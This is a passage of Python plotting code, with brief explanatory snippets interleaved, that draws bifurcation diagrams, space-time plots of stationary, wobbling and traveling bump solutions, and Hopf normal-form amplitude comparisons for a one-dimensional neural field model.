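ph = np.mod(np.linspace(0, 4*np.pi, 50) + np.pi, 2*np.pi) - np.pi
segs = list(unlink_wrap_sketch(ph))
```

Plotting each `ph[sl]` separately then produces clean, unconnected strands.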
def draw_branches_twop(ax,filelist,namelist,colorlist,ls):
i = 0
for filename in filelist:
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = np.unique(bif_qg1[:,-2])
#if len(bif_qg1[0,:]==6):
# branchlist = np.unique(bif_qg1[:,-2])
print(branchlist)
# first branch
bidx = 0
for b in branchlist:
b_idx = bif_qg1[:,-2] == b
typelist = np.unique(bif_qg1[b_idx,-3])
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx & t_idx,:]
if bidx == 0:
label = namelist[i]
else:
label = None
cx, cy = clean(dat[:,0],dat[:,1])
ax.plot(cx,cy,lw=2,color=colorlist[i],label=label,ls=ls[i])
#ax2.plot(clean(dat[:,0],dat[:,2])[0],clean(dat[:,0],dat[:,2])[1],
# lw=2,color=colorlist[i],label=label)
bidx += 1
i += 1
return ax
def oned_full_2par(subplots=1,with_numerics=True):
"""
1d domain, 2par bifurcation diagram of full system from auto
"""
fig = plt.figure(figsize=(7,7))
gs = gridspec.GridSpec(3,3)
ax1 = plt.subplot(gs[:2,:2])
"""
2 param bifurcation diagram from auto
"""
namelist = ['HB','LP 2']#['BP','HB','LP 2','LP 1']
colorlist = ['orange','purple']#['teal','orange','purple','black']
filelist = ['bif_full_a2_gq_hb.dat','bif_full_a2_gq_lp2.dat']#,'bif_full_gq_lp2.dat']#["bif_gq_bp.dat","bif_gq_hb.dat","bif_gq_lp_travel.dat","bif_gq_lp_large.dat"]
ls = ['--','-.','-', '--', '-.', ':']
ax1 = draw_branches_twop(ax1,filelist,namelist,colorlist,ls)
ax1.text(1.5,2.6,'1. Stationary Bump',rotation=0,size=15)
ax1.text(3.3,2.5,'2. Wobbling Bump',rotation=37,size=15)
#ax2.text(3.5,1.55,'3. Bistability',rotation=27,size=15)
ax1.text(3.2,.3,'4. Traveling Bump',rotation=0,size=15)
# plot solutions
#
#########################################################################################
if subplots >= 1:
ax13 = plt.subplot(gs[0,-1])
dat = oned_simple.SimDat(g=0.,q=0.,zshift=0,T=1000,phase=True)
ax13.set_xlabel(r'$x$')
ax13.set_ylabel('$t$')
ax13.set_title(r"\textbf{(a)}",x=0.1)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = int(dat.t[-1]/dat.dt)
pad = 10
start_idx = 100
print(start_idx)
#edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = 500#edge_travel_time/dat.dt-pad # total indices of travel time
wraps = 5
end_idx = start_idx+500
print(end_idx)
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax13.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
if with_numerics:
pass
#ax13.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
if False:
ax13.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,dashes=(5,2),color='#3399ff')
print('shifted oned const vel analytic by 578 with dt=%s' % dat.dt)
ax13.set_aspect('auto')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax13.set_xticklabels(x_label)
ax1.annotate('', xy=(.5, .7), xycoords='axes fraction', xytext=(1.2, 1.02),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#
#########################################################################################
if subplots >= 3:
ax13 = plt.subplot(gs[2,-1])
dat = oned_simple.SimDat(g=3.5,q=0.,zshift=.1,T=10000,phase=True)
ax13.set_xlabel(r'$x$')
ax13.set_ylabel('$t$')
ax13.set_title(r"\textbf{(c)}",x=0.1)
#start_idx = len(dat.t)/2.
#end_idx = int(1.5*start_idx)
total_time_idx = int(dat.t[-1]/dat.dt)
pad = 10
start_idx = int(np.argmin(np.mod(dat.ph_angle[total_time_idx//2:]+pi,2*pi)-pi) + total_time_idx//2 + pad//2)
print(start_idx)
edge_travel_time = (dat.b - dat.a)/dat.c_num # time it takes to go from -pi to pi
edge_travel_idx = int(edge_travel_time/dat.dt) - pad # total indices of travel time
wraps = 5
end_idx = start_idx+pad + wraps*(edge_travel_idx+pad)
#idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax13.matshow(np.roll(dat.sol[start_idx:end_idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax13.xaxis.tick_bottom()
ax13.xaxis.set_label_position('bottom')
for i in range(wraps):
start_temp = start_idx+i*edge_travel_idx + pad*i
end_temp = start_idx+(i+1)*edge_travel_idx
idx_temp = np.arange(start_temp,end_temp+1,1,dtype='int')
if with_numerics:
pass
#ax13.plot(dat.ph_angle[idx_temp],np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),lw=3,color='black')
if False:
ax13.plot(-(np.mod(dat.solph[idx_temp+578,0]+pi,2*pi)-pi),np.linspace(dat.t[start_temp],dat.t[end_temp],len(idx_temp)),ls='--',lw=2,dashes=(5,2),color='#3399ff')
print('shifted oned const vel analytic by 578 with dt=%s' % dat.dt)
ax13.set_aspect('auto')
ax13.set_xlim(-pi,pi)
ax13.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax13.set_xticks(np.arange(-1,1+.5,.5)*pi)
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax13.set_xticklabels(x_label)
ax1.annotate('', xy=(.8, .01), xycoords='axes fraction', xytext=(1.2, -.2),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 2:
### oned_nonconst_vel1
#(oned_nonconst_vel_bump,[],['oned_nonconst_vel_bump_fig.pdf']),
ax23 = plt.subplot(gs[1,-1])
dat = oned_simple.SimDat(g=3.,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
shift = -1800
sign = 1
ax23.set_xlabel(r'$x$')
ax23.set_title(r"\textbf{(b)}",x=0.1)
#ax2.set_ylabel(r'$t$')
start_idx = len(dat.t)//2
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax23.matshow(np.roll(dat.sol[idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax23.xaxis.tick_bottom()
ax23.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
for slc in unlink_wrap(dat.ph_angle[idx]):
pass
#ax23.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
if False:
for slc in unlink_wrap(modsolph):
ax23.plot(modsolph[slc],timearr[slc],ls='--',lw=2,dashes=(5,2),color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print('shifted oned_nonconst_vel_bump ana by %s where dt=%s' % (shift, dat.dt))
ax23.set_aspect('auto')
ax23.set_xlim(-pi,pi)
ax23.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax23.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax23.set_xticklabels(x_label)
ax1.annotate('', xy=(.9, .55), xycoords='axes fraction', xytext=(1.2, .45),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#ax1.annotate('', xy=(.9, .42), xycoords='axes fraction', xytext=(1.2, .45),
# arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 4:
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
sign = -1
shift = 3700#-550
ax32 = plt.subplot(gs[-1,-2])
dat = oned_simple.SimDat(g=3.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax32.set_xlabel(r'$x$')
ax32.set_title(r"\textbf{(d)}",x=0.1)
start_idx = len(dat.t)//2
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax32.matshow(np.roll(dat.sol[idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax32.xaxis.tick_bottom()
ax32.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
pass
#for slc in unlink_wrap(dat.ph_angle[idx]):
# ax32.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
if False:
for slc in unlink_wrap(modsolph):
ax32.plot(modsolph[slc],timearr[slc],ls='--',dashes=(5,2),lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print('shifted oned_nonconst_vel_bump ana by %s where dt=%s' % (shift, dat.dt))
ax32.set_aspect('auto')
ax32.set_xlim(-pi,pi)
ax32.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax32.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax32.set_xticklabels(x_label)
ax1.annotate('', xy=(.75, .32), xycoords='axes fraction', xytext=(.65, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#########################################################################################
if subplots >= 5:
### oned_nonconst_vel2
#(oned_nonconst_vel_bump,[5.5,1.,-950,-1],['oned_nonconst_vel_bump_fig2.pdf']),
sign = -1
shift = -950
ax31 = plt.subplot(gs[-1,-3])
dat = oned_simple.SimDat(g=5.5,q=1.,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
ax31.set_xlabel(r'$x$')
ax31.set_title(r"\textbf{(e)}",x=0.1)
start_idx = len(dat.t)//2
end_idx = int(1.3*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
if with_numerics:
cax = ax31.matshow(np.roll(dat.sol[idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax31.xaxis.tick_bottom()
ax31.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
if with_numerics:
pass
#for slc in unlink_wrap(dat.ph_angle[idx]):
# ax31.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
if False:
for slc in unlink_wrap(modsolph):
ax31.plot(modsolph[slc],timearr[slc],ls='--',dashes=(5,2),lw=2,color='#3399ff')
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print('shifted oned_nonconst_vel_bump ana by %s where dt=%s' % (shift, dat.dt))
ax31.set_aspect('auto')
ax31.set_xlim(-pi,pi)
ax31.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax31.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax31.set_xticklabels(x_label)
ax1.annotate('', xy=(.3, .05), xycoords='axes fraction', xytext=(.05, -.16),
arrowprops=dict(arrowstyle="<|-|>", color='k',lw=3))
#ax1.plot([0,5],[.5,.5],color='gray')
#ax2.text(1.5,.075,'reminder: added line from g=2 to g=1 for LP2')
ax1.legend(loc='upper left',fontsize=10)
ax1.set_xlabel(r'$\bm{g}$',size=15)
ax1.set_ylabel(r'$\bm{q}$',size=15)
ax1.set_xlim(1,5)
return fig
def oned_full_auto():
"""
1d bifurcation diagram from auto
see numerical_bard_sep.ode
"""
filelista2 = ["bif_full_a2_q0.5_gvary1.dat","bif_full_a2_q0.5_gvary2.dat","bif_full_a2_q0.5_gvary2b.dat"]
filelista3 = ["bif_full_a3_q0.5_gvary1.dat","bif_full_a3_q0.5_gvary2.dat","bif_full_a3_q0.5_gvary2b.dat"]
# data files obtained using numerical_bard_sep.ode
fig = plt.figure(figsize=(10,5))
ax = plt.subplot2grid((2,2),(0,0))
ax = draw_branches(ax,filelista2)
# labels
ax.set_xticks([])
ax.set_ylabel(r'$\bm{a_1}$',size=15)
# set y axis ticks to multiples of pi
ax.set_ylim(-1.5,1)
ax.set_xlim(0,5)
ax.set_title(r'\textbf{(a)}',x=0,y=1.05)
#ax.legend(loc='lower left',fontsize=10)
"""
ax.annotate("BP",color='teal',
xy=(2.36581,1.7138), xycoords='data',
xytext=(2, 2.5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='teal'),
)
"""
ax.annotate("HB",color='orange',
xy=(1.50704,0.78737), xycoords='data',
xytext=(.75, .5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='orange'),
)
# LP 2 label inset
ax.annotate("LP 2",color='purple',
xy=(2.75, .796), xycoords='data',
xytext=(3.2, .4), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
#ax.annotate(r"\colorbox{blue!20}{{\color{yellow}LP Large}}",
"""
ax.annotate("LP 1",
xy=(2.20126, 0.847046), xycoords='data',
xytext=(2.7, .40746), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w"),
)
"""
# inset
axins = inset_axes(ax,
width="30%", # width = 30% of parent_bbox
height="50%", # height : 1 inch
loc=3)
axins = draw_branches(axins,filelista2,smallscale=True)
axins.set_xlim(2.1,2.9)
axins.set_ylim(.78,.82)
# bistability for inset
axins.plot([2.25346,2.25346],[-2,2],ls=':',color='black')
axins.plot([2.38425,2.38425],[-2,2],ls=':',color='black')
# LP 2 label inset
axins.annotate("LP 2",color='purple',
xy=(2.81, .796), xycoords='data',
xytext=(2.68, .785), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
plt.tick_params(axis='both', which='both', bottom=False, top=False, labelbottom=False, right=False, left=False, labelleft=False)
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax, axins, loc1=2, loc2=4, fc="none", ec="0.5")
# mark bistability
ax.plot([2.25346,2.25346],[-2,2],ls=':',color='black')
ax.plot([2.38425,2.38425],[-2,2],ls=':',color='black')
ax2 = plt.subplot2grid((2,2),(1,0))
ax2.set_title(r'\textbf{(b)}',x=0,y=1.05)
ax2 = draw_branches(ax2,filelista3)
ax2.set_ylabel(r'$\bm{a_2}$',size=15)
ax2.set_xlabel(r'$\bm{g}$',size=15)
ax2.set_ylim(-1,.1)
ax2.set_xlim(0,5)
# inset
axins = inset_axes(ax2,
width="30%", # width = 30% of parent_bbox
height=1., # height : 1 inch
loc=1)
axins = draw_branches(axins,filelista3,smallscale=True)
axins.set_xlim(2.1,3.)
axins.set_ylim(-.83,-.73)
# inset bistability
axins.plot([2.25346,2.25346],[-2,2],ls=':',color='black')
axins.plot([2.38425,2.38425],[-2,2],ls=':',color='black')
# inset lp2
axins.annotate("LP 2",color='purple',
xy=(2.84, -.779), xycoords='data',
xytext=(2.7, -.75), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
plt.tick_params(axis='both', which='both', bottom=False, top=False, labelbottom=False, right=False, left=False, labelleft=False)
plt.xticks(visible=False)
plt.yticks(visible=False)
mark_inset(ax2, axins, loc1=2, loc2=4, fc="none", ec="0.5")
"""
ax2.annotate("BP",color='teal',
xy=(2.36581,1.7138), xycoords='data',
xytext=(2, 2.5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='teal'),
)
"""
ax2.annotate("HB",color='orange',
xy=(1.50704,0.), xycoords='data',
xytext=(1., -.2), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='orange'),
)
ax2.annotate("LP 2",color='purple',
xy=(2.84, -.779), xycoords='data',
xytext=(3., -.5), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w",color='purple'),
)
#ax2.annotate(r"\colorbox{blue!20}{{\color{yellow}LP Large}}",
"""
ax2.annotate("LP 1",
xy=(2.20126, 0.847046), xycoords='data',
xytext=(2.7, .40746), textcoords='data',
size=15, va="center", ha="center",
arrowprops=dict(arrowstyle="->",
relpos=(0., 0.),
fc="w"),
)
"""
#ax.set_xlabel(r'$\bm{g}$',size=15)
# mark bistability
ax2.plot([2.25346,2.25346],[-2,2],ls=':',color='black')
ax2.plot([2.38425,2.38425],[-2,2],ls=':',color='black')
ax3 = plt.subplot2grid((2,2),(0,1),rowspan=2)
ax3.set_title(r'\textbf{(c)}',x=0,y=1.02)
namelist = ['HB','LP 2']#['BP','HB','LP 2','LP 1']
colorlist = ['orange','purple']#['teal','orange','purple','black']
filelist = ['bif_full_a2_gq_hb.dat','bif_full_a2_gq_lp2.dat']#,'bif_full_gq_lp2.dat']#["bif_gq_bp.dat","bif_gq_hb.dat","bif_gq_lp_travel.dat","bif_gq_lp_large.dat"]
ls = ['--','-.','-', '--', '-.', ':']
ax3 = draw_branches_twop(ax3,filelist,namelist,colorlist,ls)
ax3.text(1.5,2.6,'1. Stationary Bump',rotation=0,size=15)
ax3.text(3.3,2.5,'2. Wobbling Bump',rotation=37,size=15)
#ax2.text(3.5,1.55,'3. Bistability',rotation=27,size=15)
ax3.text(3.2,.3,'4. Traveling Bump',rotation=0,size=15)
ax3.plot([0,5],[.5,.5],color='gray')
#ax2.text(1.5,.075,'reminder: added line from g=2 to g=1 for LP2')
#ax3.legend(loc='upper left',fontsize=8)
ax3.set_xlabel(r'$\bm{g}$',size=15)
ax3.set_ylabel(r'$\bm{q}$',size=15)
ax3.set_xlim(1,5)
return fig
def root(ushift,g):
"""
find slow limit cycle/wobbling bump
"""
time = 882.4*5
sim = oned_simple.SimDat(q=0.5,g=g,T=time,ushift=ushift,zshift=1e-5)
max_loc = np.r_[True, sim.ph_angle[1:] > sim.ph_angle[:-1]] & np.r_[sim.ph_angle[:-1] > sim.ph_angle[1:], True]
local_maxima = sim.ph_angle[max_loc][1:-1]
diffraw = local_maxima[-2] - local_maxima[-3]
print('diffraw=%s ushift=%s' % (diffraw, ushift))
return diffraw
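`root` detects local maxima of the phase angle with a boolean `np.r_` mask and then trims the first and last candidates. A standalone sketch of that detector on toy data:

```python
import numpy as np

def local_maxima(x):
    # True where a sample strictly exceeds both neighbours; the padded
    # endpoints only need to beat their single neighbour, as in root().
    mask = np.r_[True, x[1:] > x[:-1]] & np.r_[x[:-1] > x[1:], True]
    return x[mask]

x = np.array([0., 2., 1., 3., 0., 5.])
candidates = local_maxima(x)   # includes the boundary sample x[-1]
interior = candidates[1:-1]    # root() trims first/last candidates
```

Trimming discards maxima that may touch the ends of the simulated window, where the limit cycle has not yet settled.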
def oned_normal_form():
"""
1d normal form calculation. probably incorrect. see bard's normal form calculation below.
"""
fig = plt.figure(figsize=(8,4))
#ax = fig.add_subplot(111)
ax = plt.subplot2grid((1,2),(0,0))
ax2 = plt.subplot2grid((1,2),(0,1))
#ax3 = plt.subplot2grid((2,1),(1,1))#fig.add_subplot(132)
ax.set_title(r"\textbf{(a)}",x=0,y=1.05)
gvals_long = np.linspace(1.5,2.,201) # use in theory
# theory
ss = oned_simple.SteadyState()
mu = ss.kap
Aprime = ss.Hamp
# get a better approximation later.
eps = .01
period = eps*882.4 # period in tau (period in t times eps)
#period = eps*441.2 # period in tau
om = 2*pi/period
# for a cosine kernel, H(x) = A'sin(x)
h1 = Aprime*1.
h3 = Aprime*(-1./6)
be = 1.
q = .5
gstar = (mu*be - q*(-Aprime))/Aprime#+.00625
print('Aprime=%s om=%s gstar=%s' % (Aprime, om, gstar))
#B = 2*sqrt( -(be**2 + 4.*om**2)*h1/(gstar*h3) )/(6.*om)
f1 = sqrt(be**2. + om**2.)
#f2 = sqrt(be**2. + 4*om**2.)
#B = 2*om*sqrt(h1*f2)/sqrt(h3*(12.*q*f1*f2-144.*gstar*om**4))
B = 2.*(2.*sqrt(h1*om))/(f1*sqrt(h3*((12.*q)/om - (144.*gstar*om**3.)/(be**4. + 5.*be**2.*om**2. + 4.*om**4.))))
amp = B*sqrt(gvals_long-gstar)
#amp = sqrt(g-gstar)
# numerics
#gvals_short = [1.5,1.505,1.51,1.515]
#gvals_short = np.linspace(1.5,1.75,41)
gvals_short = np.arange(1.50625,2.,.00625)
amp_num = np.zeros(len(gvals_short))
i = 0
ushift = 0.
zshift = 1e-5
savedir = 'hopf_data/'
if (not os.path.exists(savedir)):
os.makedirs(savedir)
for g in gvals_short:
time = 1500.#882.4*2
print("g="+str(g))
tol = 5e-4
filename = 'osc_g='+str(g)+'.dat'
if os.path.isfile(savedir+filename):
local_max = float(open(savedir+filename,'r').readline())
#print local_max
else:
#print
#ss_time = sim.t[int(time/sim.dt/1.5):]
sim = oned_simple.SimDat(q=0.5,g=g,T=time,ushift=0,zshift=.1,sim_factor=70)
max_loc = np.r_[True, sim.ph_angle[1:] > sim.ph_angle[:-1]] & np.r_[sim.ph_angle[:-1] > sim.ph_angle[1:], True]
local_maxima = sim.ph_angle[max_loc][1:-1]
local_max = local_maxima[-1]
file_ = open(savedir+filename,'w')
file_.write(str(local_max))
file_.close()
amp_num[i] = local_max
#mp.figure()
#mp.plot(sim.t,sim.ph_angle)
#mp.show()
#ushift = sp.optimize.brentq(root,0,pi,args=(g,),rtol=1e-4)
i += 1
data = np.zeros((len(gvals_short),2))
data[:,0] = gvals_short
data[:,1] = amp_num
"""
ax.annotate("("+str(data[20,0])+","+str(data[20,1])+")",
xy=(data[20,0], data[20,1]), xycoords='data',
xytext=(data[20,0]-.05, data[20,1]+.05), textcoords='data',
size=12,
arrowprops=dict(arrowstyle="-|>",
connectionstyle="arc3")
)
"""
#np.savetxt("hopf_amplitude.dat")
ax.plot(gvals_long,amp,color="#3399ff",ls='dashed',label="Theoretical",lw=3)
ax.plot(gvals_short,amp_num,color="black",label="Numerical",lw=3)
ax.set_xlim(data[:,0][0]-.01,data[:,0][-1]+.01)
ax.set_ylabel(r"\textbf{Oscillation Amplitude (A)}")
ax.set_xlabel(r"\textbf{Adaptation (g)}")
ax.legend(loc=4)
"""
PLOT SOLUTION ARRAY
"""
x_label = [r"$-\pi$", r"$-\pi/2$", r"$0$", r"$\pi/2$", r"$\pi$"]
dat = oned_simple.SimDat(g=1.55,q=.5,zshift=.1,T=10000,phase=True)
# period is approx 525 time units
shift = -700
sign = 1
ax2.set_xlabel(r'$x$')
ax2.set_title(r"\textbf{(b)}",x=0)
#ax2.set_ylabel(r'$t$')
start_idx = len(dat.t)//2
end_idx = int(1.5*start_idx)
idx = np.arange(start_idx,end_idx+1,1,dtype='int')
cax = ax2.matshow(np.roll(dat.sol[idx,:dat.N],dat.N//2),cmap='gray',extent=[-pi,pi,dat.t[end_idx],dat.t[start_idx]])
#fig.colorbar(cax)
ax2.xaxis.tick_bottom()
ax2.xaxis.set_label_position('bottom')
timearr = np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx))
for slc in unlink_wrap(dat.ph_angle[idx]):
ax2.plot(dat.ph_angle[idx][slc],timearr[slc],color='black',lw=3)
modsolph = -(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign
for slc in unlink_wrap(modsolph):
ax2.plot(modsolph[slc],timearr[slc],ls='--',color='#3399ff',lw=3)
#ax.plot(dat.ph_angle[idx],np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),color='black',lw=3)
#ax.plot(-(np.mod(dat.solph[idx+shift,0]+pi,2*pi)-pi)*sign,np.linspace(dat.t[start_idx],dat.t[end_idx],len(idx)),ls='--',color='.65',lw=2)
print('shifted oned_nonconst_vel_bump ana by %s where dt=%s' % (shift, dat.dt))
ax2.set_aspect('auto')
ax2.set_xlim(-pi,pi)
ax2.set_ylim(dat.t[end_idx],dat.t[start_idx])
ax2.set_xticks(np.arange(-1,1+.5,.5)*pi)
#x_label = [r"$0$", r"$\frac{\pi}{4}$", r"$\frac{\pi}{2}$", r"$\frac{3\pi}{4}$", r"$\pi$"]
ax2.set_xticklabels(x_label)
return fig
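The analytic-phase overlay repeatedly maps the solution onto (−π, π] with a sign flip via `-(np.mod(x+pi,2*pi)-pi)`. A small check of that transform on hand-picked values:

```python
import numpy as np
pi = np.pi

def wrap_neg(x):
    # Map x into (-pi, pi] and negate, matching the overlay transform above
    return -(np.mod(x + pi, 2*pi) - pi)

vals = np.array([0.0, pi/2, pi + 0.1, -pi - 0.1, 3*pi])
wrapped = wrap_neg(vals)
```

Values just past +π wrap to just below +π after negation, which is exactly the jump the `unlink_wrap` segmentation has to break apart.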
def oned_normal_form_bard():
"""
oned normal form using bard's data
"""
filename = 'diagram.dat'
filename2 = 'diagram.25.dat'
# get all branches
bif_qg1 = np.loadtxt(filename)
branchlist = [2]
b_idx = bif_qg1[:,-2] == branchlist[0]
typelist = [3]#np.unique(bif_qg1[b_idx,-3])
#print typelist
for t in typelist:
t_idx = bif_qg1[:,-3] == t
dat = bif_qg1[b_idx & t_idx,:]
label = None
# get all branches
bif_qg2 = np.loadtxt(filename2)
branchlist2 = [2]
b_idx2 = bif_qg2[:,-2] == branchlist2[0]
typelist2 = [3]#np.unique(bif_qg2[b_idx2,-3])
#print typelist
for t in typelist2:
t_idx2 = bif_qg2[:,-3] == t
dat2 = bif_qg2[b_idx2 & t_idx2,:]
label = None
fig = plt.figure(figsize=(10,4))
ax = fig.add_subplot(121)
ax.plot(dat[:,0],dat[:,1],label='AUTO',lw=3,color='black')
dom1 = np.linspace(2,2.5,100)
ax.plot(dom1,2*np.sqrt((10./13.)*(dom1-2)),label='Normal Form',lw=3,ls='--',color='#3399ff')
ax.set_title(r'\textbf{(a)}',x=0,y=1.03)
ax.set_ylabel(r"\textbf{Oscillation Amplitude}")
ax.set_xlabel(r"\textbf{Adaptation ($g$)}")
#ax.set_xlabel(r'Adaptation ($g$)')
#ax.set_ylabel(r'Oscillation Amplitude')
ax.set_xlim(2,2.5)
ax.set_ylim(0,1.4)
#ax.legend()
ax2 = fig.add_subplot(122)
ax2.plot(dat2[:,0],dat2[:,1],label='AUTO',lw=3,color='black')
dom2 = np.linspace(1.25,1.5,100)
ax2.plot(dom2,2*np.sqrt(.5*(dom2-1.25)/.2175),label='Normal Form',lw=3,ls='--',color='#3399ff')
ax2.set_title(r'\textbf{(b)}',x=0,y=1.03)
ax2.set_ylabel(r"\textbf{Oscillation Amplitude}")
ax2.set_xlabel(r"\textbf{Adaptation ($g$)}")
#ax2.set_xlabel(r'Adaptation ($g$)')
#ax2.set_ylabel(r'Oscillation Amplitude')
ax2.set_xlim(1.25,1.5)
ax2.set_ylim(0,1.6)
ax2.legend(loc='lower right')
return fig
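Both dashed 'Normal Form' curves above follow the square-root amplitude law of a supercritical Hopf bifurcation, r(g) = 2*sqrt(c*(g - g_c)). A hedged sketch of that scaling (the coefficient 10/13 and onset g_c = 2 are the panel (a) values from the code above; no claim they apply elsewhere):

```python
import numpy as np

def hopf_amplitude(g, g_c, coeff):
    """Square-root amplitude r = 2*sqrt(coeff*(g - g_c)) past a
    supercritical Hopf bifurcation; clipped to zero below onset."""
    g = np.asarray(g, dtype=float)
    return 2.0 * np.sqrt(coeff * np.clip(g - g_c, 0.0, None))

# panel (a): onset at g = 2 with coefficient 10/13
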